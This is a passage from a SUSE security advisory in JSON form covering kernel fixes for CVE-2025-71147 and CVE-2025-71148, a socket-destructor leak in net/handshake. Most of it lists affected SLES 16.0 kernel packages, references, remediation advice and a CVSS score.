"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71147"
},
{
"cve": "CVE-2025-71148",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71148"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: restore destructor on submit failure\n\nhandshake_req_submit() replaces sk-\u003esk_destruct but never restores it when\nsubmission fails before the request is hashed. handshake_sk_destruct() then\nreturns early and the original destructor never runs, leaking the socket.\nRestore sk_destruct on the error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71148",
"url": "https://www.suse.com/security/cve/CVE-2025-71148"
},
{
"category": "external",
"summary": "SUSE Bug 1257159 for CVE-2025-71148",
"url": "https://bugzilla.suse.com/1257159"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
